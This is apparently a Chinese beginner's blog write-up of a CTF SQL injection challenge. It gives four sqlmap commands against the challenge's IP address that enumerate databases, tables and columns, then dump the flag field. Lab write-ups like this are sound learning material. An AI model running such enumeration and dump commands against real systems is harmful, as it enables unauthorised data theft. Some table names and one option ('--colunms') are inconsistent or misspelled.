第一次使用sqlmap，在网上搜了一下sql常用命令。

 四个命令顺利拿下flag，看着终端代码跑起来没有发生错误确实挺爽的，写篇博客记录一下吧，毕竟是第一次使用sqlmap并且很顺利的做出第一道SQL注入题。

题目

 看到题目，很显然这是一道SQL注入题。

 打开链接，依次输入1，2，3，4，没有得到什么有效内容。直接打开Kali用sqlmap注入。

1、获取数据库

sqlmap -u http://49.234.224.119:7415/?id=1 --dbs

 一顿注入之后，得到五个数据库
 看第一个数据库的名字，感觉flag在这里面的概率比较大。

2、列出geek_sql数据库中的表名

sqlmap -u http://49.234.224.119:7415/?id=1 -D geek_sql --tables

 得到两个表

 这下没啥悬念了，继续

3、列出flllag表中的字段名

sqlmap -u http://49.234.224.119:7415/?id=1 -D geek_sql -T fllllag --colunms

 得到两个字段名

 fllllllag.txt都出来了，离获取flag就差一步了！！！

4、获取fllllllag字段内容

sqlmap -u http://49.234.224.119:7415/?id=1 -D geek_sql -T fllllag -C fllllllag --dump

 得到flag

总结

 没有什么技术含量，就是记录一下第一次做出sql注入题。